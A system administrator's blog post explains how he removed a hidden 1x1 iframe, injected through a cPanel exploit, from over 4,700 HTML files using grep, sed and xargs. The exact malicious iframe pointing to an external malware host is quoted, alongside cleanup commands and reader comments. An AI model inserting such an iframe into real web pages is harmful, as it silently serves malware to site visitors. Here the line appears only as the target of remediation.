How I used the Unix command line to do a multi-file search and replace to fix over 4,700 individual files


Evil hackers attack!

Some customers of mine recently reported some suspicious behavior on one of their sites. I discovered, with dismay, that a number of months ago there was a nasty cPanel exploit that some evil hackers had used to insert a malicious line of code into the bottom of every HTML page on this server. After verifying that the cPanel installation had been fixed, I used grep to search through all the files on the server to see if any other files had been touched by the hackers. I found over 4,700 individual files that had malicious code added and knew that something needed to be done immediately to address this problem.

Not the best way to start my day…

The Problem

This is the code that had been added right above the closing </body> tag in these files:

<iframe src="http://www.constellations.ws/index.php" width=1 height=1 frameborder=0 scrolling=NO></iframe>

Because this iframe references an external site (“constellations.ws”), it allowed malicious ActiveX code to be served to people viewing the infected pages. I had to remove all instances of this bad code immediately to keep anyone else from having problems.

How I fixed 4,700 files with one command

First, I changed into /home/, which contains all user account files on this server.

# cd /home/

Then I ran this Unix command-line search and replace to find all files that contained the malicious text and replace the bad text with nothing, which deletes it:

# grep -rl constellations.ws * | sed 's/ /\\ /g' | xargs sed -i 's/<iframe src="http:\/\/www.constellations.ws\/index.php" width=1 height=1 frameborder=0 scrolling=NO><\/iframe>//g'

What’s with all the grep, sed and xargs stuff?

The way this works is it first does a search using grep for all files that contain the bad text – “constellations.ws”. Using the -l flag tells grep to only print out the filename of the matched files instead of both the filename and the matching line(s). The -r option tells grep to recursively search every directory and file, not just the files in the current directory.

Next, the output of the initial search is piped to sed (the stream editor) to escape any spaces in the results. Some of the directories had spaces in their names, and this step replaces each space with a backslash followed by a space, which prepares the paths for the next step.
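Here is a small sketch of what that escaping step does, using a made-up path rather than anything from my server. Note the doubled backslash in the sed replacement: a single backslash followed by a space would just produce a plain space. The `-n 1 echo` part is only there to count how many arguments xargs sees.

```shell
# Hypothetical path with spaces, for illustration only.
path='my site/index page.html'

# Escape each space with a backslash.
escaped=$(printf '%s\n' "$path" | sed 's/ /\\ /g')
echo "$escaped"

# Without escaping, xargs splits the path at every space.
raw_count=$(printf '%s\n' "$path" | xargs -n 1 echo | wc -l)
# With escaping, xargs treats backslash-space as part of one argument.
escaped_count=$(printf '%s\n' "$escaped" | xargs -n 1 echo | wc -l)
echo "arguments without escaping: $raw_count, with escaping: $escaped_count"
```

This only covers spaces. File names containing quotes or newlines would still confuse xargs.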

The final step is to pipe the escaped results of the grep command to xargs, which passes the file names as arguments to the specified sed command. That command looks for the specific bad code and replaces it with nothing (deleting it). Note the backslashes in the code to be replaced: these escape the / characters, which sed would otherwise interpret as the delimiters of the s command. The -i option tells sed to edit files in place instead of sending the result to standard output, so each file is saved after the replacement has been made. The g flag tells sed to replace every instance of the found text on a line, not just the first.
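For comparison, here is a variant of the same pipeline that is not what I ran, sketched against a throwaway directory. It assumes GNU grep and GNU sed. The `demo` directory and its files are invented for the example. It lets grep and xargs exchange NUL-terminated file names so no space escaping is needed, and it uses | as the sed delimiter so the slashes in the URL need no backslashes.

```shell
# Build a throwaway directory tree so nothing real is touched.
demo=$(mktemp -d)
mkdir -p "$demo/my site/sub dir"
bad='<iframe src="http://www.constellations.ws/index.php" width=1 height=1 frameborder=0 scrolling=NO></iframe>'
printf '<html><body>\n<p>Hello</p>\n%s\n</body></html>\n' "$bad" > "$demo/my site/sub dir/index page.html"
printf '<html><body>\n<p>Clean</p>\n</body></html>\n' > "$demo/clean.html"

# -Z makes grep end each file name with a NUL byte; xargs -0 splits on NUL,
# so spaces in paths are harmless. The dots are escaped so they match
# literal dots only.
grep -rlZ 'constellations\.ws' "$demo" |
  xargs -0 sed -i 's|<iframe src="http://www\.constellations\.ws/index\.php" width=1 height=1 frameborder=0 scrolling=NO></iframe>||g'

# Count files that still mention the domain.
remaining=$(grep -rl 'constellations\.ws' "$demo" | wc -l)
echo "files still infected: $remaining"
```

The substitution leaves an empty line where the iframe used to be, which is harmless in HTML.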

To make sure that I had fixed every file, I ran a final check:

# grep -r constellations.ws *

This confirmed that all of the malicious code had been removed correctly from the HTML files. There were a couple of temporary web stat log files that still had references to “constellations.ws” in them (recorded as link clicks) but there were indeed no more references to the code that I had removed with the command.
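If leftover log entries clutter the check, one option is to limit it to HTML files. This is a sketch that assumes GNU grep, whose --include option filters by file name. The files below are invented stand-ins for a cleaned page and a stats log.

```shell
# Throwaway files: one cleaned page and one log that still names the domain.
demo=$(mktemp -d)
printf '<p>clean page</p>\n' > "$demo/index.html"
printf 'GET /out?to=constellations.ws 200\n' > "$demo/stats.log"

# Every file that still mentions the domain.
all_hits=$(grep -rl 'constellations\.ws' "$demo" | wc -l)
# Only files whose names end in .html.
html_hits=$(grep -rl --include='*.html' 'constellations\.ws' "$demo" | wc -l)
echo "all files: $all_hits, HTML files: $html_hits"
```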

You will need to run this as root if you are cleaning out an entire server; otherwise you will only be able to change files that your user has permission to edit.

Using this for yourself: a Unix multi-file search and replace command template

Here is a generalized multi-file search and replace command template that you can use on your own server:

# grep -rl FIND_STRING * | sed 's/ /\\ /g' | xargs sed -i 's/EXACT_FIND_STRING/REPLACE_STRING/g'

Using this code you will search for all files that contain FIND_STRING, then replace every specific instance of EXACT_FIND_STRING with the value you supply for REPLACE_STRING. You must properly escape the text that you are searching for as well as the text you are using to replace what gets found. Note that FIND_STRING may be the exact same text as EXACT_FIND_STRING, but this method lets you use FIND_STRING to search for a smaller part of the thing you’re looking for like I did in the example above.
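To show why escaping matters, here is a short sketch with made-up input strings. It covers two common cases: a dot in the search text, and an ampersand in the replacement text.

```shell
# An unescaped dot matches any character, so this also rewrites a lookalike.
loose=$(printf 'constellationsXws\n' | sed 's/constellations.ws/REPLACED/g')
# Escaping the dot restricts the match to a literal ".".
strict=$(printf 'constellationsXws\n' | sed 's/constellations\.ws/REPLACED/g')
# In the replacement, & means "the matched text", so a literal & needs a backslash.
amp=$(printf 'a b\n' | sed 's/ / \& /g')
echo "$loose | $strict | $amp"
```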

If you want to preview what the command will do before you commit a save (not a bad idea), simply omit the -i option from the sed command that is connected to the xargs command. sed will then print the modified contents of each matching file to standard output (your terminal) without saving anything. If it looks right, then run the command as given above (including the -i) and the files will be saved with the text changes.
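Two other ways to stay cautious, sketched on a throwaway file: print only the lines that would change, and keep a backup copy when committing. The file name and the text BAD are placeholders. Attaching a suffix directly to -i is supported by GNU sed, and I believe by BSD sed as well.

```shell
# Throwaway file for the demonstration.
demo=$(mktemp -d)
printf 'keep this line\nremove BAD here\n' > "$demo/page.html"

# Preview: -n suppresses normal output and the p flag prints only lines
# where a substitution happened.
preview=$(sed -n 's/BAD //gp' "$demo/page.html")
echo "would become: $preview"

# Commit, keeping the original as page.html.bak.
sed -i.bak 's/BAD //g' "$demo/page.html"
ls "$demo"
```

On a large cleanup the .bak files double the file count, so they need to be removed once the result has been checked.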

I hope this is a helpful explanation of how to search for a particular string using the Unix command line in multiple files and then replace it with something else. Happy searching and replacing!

Disclaimer: I am not responsible for anything you do on your own server. This worked for me, but I was pretty careful to make sure that it was appropriate for my specific case. This command WILL CHANGE FILES on your server. Understand what it is doing before you run it.


14 responses to “How I used the Unix command line to do a multi-file search and replace to fix over 4,700 individual files”

  1. That’s ok, but if your path has dir names with spaces, it won’t work

    The proper way to do it would be with find:

    find . -type f -exec sed -i 'regex' '{}' ';'

  2. The first sed fixes the pathnames with spaces issue. Also your way would execute the sed on every single file in the filesystem instead of just in the ones that in fact had the code.

    I love the fact that there is always more than one way to get things done using Unix… 🙂

  3. >>I’m pretty sure it was a script that was able to run on the box itself. The cPanel vulnerability was pretty severe to let that happen.

    What have you done to keep this from happening again? Does the vulnerability still exist?

  4. I just tried this on a server. It works pretty well, but if a file has a space in the name, it assumes everything before the space is a directory name and fails on those files. Is there a way to overcome this?
